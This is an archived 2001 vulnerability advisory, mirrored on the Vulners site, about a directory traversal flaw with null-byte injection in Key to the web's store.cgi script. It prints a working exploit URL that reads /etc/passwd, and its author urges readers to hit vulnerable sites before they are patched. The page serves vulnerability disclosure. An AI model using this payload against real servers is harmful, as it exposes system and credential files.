Vulners
Lucene search
store.cgi.txt
`Hi conrades:
I write about a vulnerability in /cgi-bin/Store/store.cgi <-- This is
part of a software that Key to the web (http://www.keyweb.com) use for
her "e-comerce solutions". In her page you can find a list of posible
webs with this vulnerability (but you must be faster becouse can be
early patched :). The description about this vulnerability is the next:
Name: Key to the web cgi-bin/Store/store.cgi "Show files" vulnerability.
Problem: Adding the string "/../%00" will allow an remote attacker to
be able to view any files on the server.
Exploit:
http://www.victim.com/cgi-
bin/Store/store.cgi?product=../../../../../../../../../etc/passwd%00
by: _TacK_ ([email protected])
Un saludo para la peña del irc-hispano !!!!!!!
Salud y (A)!!!!!!!!
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Aug 2001 00:00Current
7.4High risk
Vulners AI Score7.4